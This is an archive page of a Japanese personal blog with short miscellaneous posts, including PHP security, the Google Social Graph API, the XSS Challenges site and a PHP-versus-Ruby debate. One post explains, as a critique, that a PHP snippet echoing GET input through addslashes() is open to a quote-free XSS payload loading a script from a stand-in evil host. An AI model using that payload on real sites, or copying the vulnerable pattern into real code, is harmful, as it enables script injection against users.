— boreal-kiss.com

Archive
Tag "Misc"

http://www.behance.net/Gallery/TETRICE/60982

TETRICE on the Behance Network (via ITクオリティ)

製氷皿のカラーリングがいい感じ。おいしそうって思ったら氷に透明感があるからなのね。白濁の原因になる不純物や気泡を残さないような氷に仕上げるには少し努力が必要みたい。透明な氷の作り方

Read More

非モテ男子と自己申告して申し込むと1575円安くなるらしい。プライドがこれより安い場合はお得かも。

『 非モテ男子 』 は、初期費用が半額となります。
お申込みの際、必ず 『 非モテ男子 』 にチェックを入れてお申し込みください。

Read More

某有名FLASHerさんが珍しくPHPで作品を公開していたので、「へえ、この人PHPも使うんだ」と思いながら、間違えて変なの入力したら(嘘だけど)、以下のようにして入力を扱っている様子。


<?php
echo addslashes($_GET['txt']);
?>

これって一見良さそうだけど以下のようなシングルクオートもダブルクオートも使わないスクリプトは読み込める。クオートなくても動くってのがまず驚きだけどクオートを書かないって発想がさらに驚愕 (参考:XSS (Cross Site Scripting) Cheat Sheet)。


<script src=http://evil.example.com/xxx.js /></script>

読み込んだxxx.jsファイルの中身はaddslashes()の制限を受けないので何でもアリの無法地帯。うまいこと第三者をおびきよせてxxx.jsの中身を読ませることができる。まあただの揚げ足取りなんだけど(でもセキュリティ屋がやってることはこういうことでしょ?)要するに言いたかったことは、このFLASHerさんはActionScriptは(少なくとも僕から見て)達人級であってプログラムを書くこと自体には熟練しているということ。ほんとにプログラミングゼロからの人間にセキュリティを気にしろって言うのは無理があると思っただけ。

Read More

はてなダイアリーとかYahoo!ブログも似たような感じだけど、はてな住民やYahoo!ID持ってないとコメントできないってとこが超絶中途半端(中途半端が超絶という意味)に閉鎖的。苦情書きたくてもIDないとダメとか意味わからん。なんか内輪ノリだし。こういうのはとっととなくなってもっとオープンにしてもらいたいです。ということでtarget=”friend”頑張って書くよ!

Googleは2008年2月1日,Web上のリンクから交友関係を抽出するWebサービスのAPI「Social Graph API」を公開した。ブログやプロフィール・ページのURLなどを入力すると,Googleが収集した,そのサイトを友人としてリンクしている友人のサイトを出力する。このサービスを使うことで,SNS(ソーシャル・ネットワーキング・サービス)サイトを利用しなくともブログ同士でSNSのような機能を実現することが可能になる。

ブログ同士で“SNS”が作れる,Googleが「Social Graph API」サービス公開:ITpro
Social Graph API – Google Code

Read More

プログラムのセキュリティホールを探していくゲーム的サイト、XSS Challengesが流行ってるみたい。ちょうど入門PHPセキュリティ(やっと届いた)を読み始めたところだったのでとても興味深い。このサイトではクロスサイトスクリプティング(僕にとっては未だバズワード)でインジェクションする内容は危険ではないようなので、むしろこれでビックリするような情報が抜けるようなデモンストレーションがあればさらに教育的だった。実際に泥棒が家に侵入するとどういった被害に遭う可能性があるかは大多数の人がイメージできるけど、インターネットの世界だとそれはもう確実に困難。実生活よりももっと具体的な犯行手口と予想被害を見せていかないと、なかば怒り気味に防犯、防犯と叫んでみたり、他人のソースコードの穴を見つけて嘲笑まがいのトラックバックをするだけでは皆に全体像は見えてこない。悪さの方法を知って面白半分にやる輩も出て来るだろうけど、それ以上に「え、これやばくない?」みたいにセキュリティ意識に関する利益の方が多いだろうし。遊びだとしてもこのサイトのやり方には賛成。そして全ステージクリアしてる人とかすげーよなあ。惚れるぜ。

入門PHPセキュリティ
入門PHPセキュリティ

Read More

(鵜呑み禁止)

はてな界隈で盛り上がってる。僕自身のPHPを学ぶ気力に関わってきそうだったので追尾してたけど、結局[Z]ZAPAブロ〜グ2.0さんの「プログラミング言語は宗教みたいなもの」で全部片付いちゃうんじゃないの。宗教よりも実際の言語間の言い争いかな。信仰と違ってなまじっか客観的に色々指摘できちゃうからこうなる。「日本でしか使えない日本語覚えて効率悪くない?」とか「なんで日本語って文章の最期まで聞かないと結論わかんないの?不便だね」とか言われて逆上してるような感じ。

面白いねプログラミング言語やってる人達って(ごく一部なんだろうけど)。比較惑星学みたいに「比較プログラミング言語学」とかつくっちゃえばいいのに。あーでも惑星やってる連中は仲いいよ。「月冷えきっちゃってんじゃん」とか「金星ってプレート運動ないの?うわ、だせえ」とかならない。メインの研究対象以外あんまり興味を持たないってのもあるかもだけど。

事の発端。Rubyの作者さんなんですね、ビックリ。

特に「PHPは初心者に学びやすい(と言われていることが問題である)」という部分に共感する。 PHPは初心者に簡単かもしれないが、初心者による手を抜いたWebアプリケーションは PHPが作られた当初はともかく、現代では害悪ではないだろうか。Webアプリケーションをなめるな

Matzにっき / PHPがいかに駄目な言語か、という話。

PHP側。(面白い部分を引用)

まあ、ハッカーというか天才というかとにかく偉い(と周囲に持ち上げられている)人が怪気炎っぽいものをあげて自分の好まないものをこきおろすのは、これまたよくあることではある。

Web屋のネタ帳 / どの言語で書いてもおかしなコードを書く奴は書く。

Perl。(意味不明なんで割愛)

404 Blog Not Found / 「PHPなめんな」と「(Perl|Python|Ruby)をなめんな」の違い

PHP側。

プログラミング言語は宗教みたいなもので、好きか嫌いかですぐに論争になります。

[Z]ZAPAブロ〜グ2.0 / PHPは定期的にネタにされる

ところで下のやつは何がダメなの?切実に理由が知りたいです。

PHP使ってるヤツらって

htmlspecialchars($_GET[‘text’]);

こんなコード書いてる!

m9(^Д^)プギャー

[Z]ZAPAブロ〜グ2.0 / PHPは定期的にネタにされる

ネタのような気もするけどこんなのまであるらしい。面白い。

PHPやってるだけでバカにされるんですがどうしたらいいでしょうか。

そしてまだ届かない!!「薄い」ってのに超期待してんだけどなあ。

入門PHPセキュリティ
入門PHPセキュリティ

追記。なるほど。こういうのが知りたかった。PHPの方が人為的ミスが生じやすいわけね。

RubyやPerlでは外部から入力された文字列にtaint(汚染)と呼ばれるマークがつく。 taintされた文字列から加工された文字列にもtaintがつく。これをチェックすることで外部からの入力をチェック(サニタイズ)しないまま危険な操作(ファイル名にする、systemを呼び出す、HTML/SQLに埋めこむ、など)を禁止することができる。

Matzにっき / 安全なWebアプリのために言語ができること

Read More

アーティストの作品なんだから敬意を払うべき。abuseにもほどがある。全然笑えない。

アトリエかぐや「夏神」は、非常に危険なエロゲー(エロ注意)

Read More

JavaScriptっぽい字面になった?実際のオライリーのイラストは結構黒地が多いんだな。

http://oreilly.picovideo.jp

Read More

なんかAmazonで大人買いした時に間違って買っちゃったみたい。アメリカンジョークもダラダラ訳されてて最高だぜ!似たようなのがO’Reilly Makerで作れまっせ。

Read More

これ一体何でできてんの?重さ100gになってるけどサイズ不明で超怖い。

ドラゴンクエスト メタリックモンスターズ ギャラリー はぐれメタル

Read More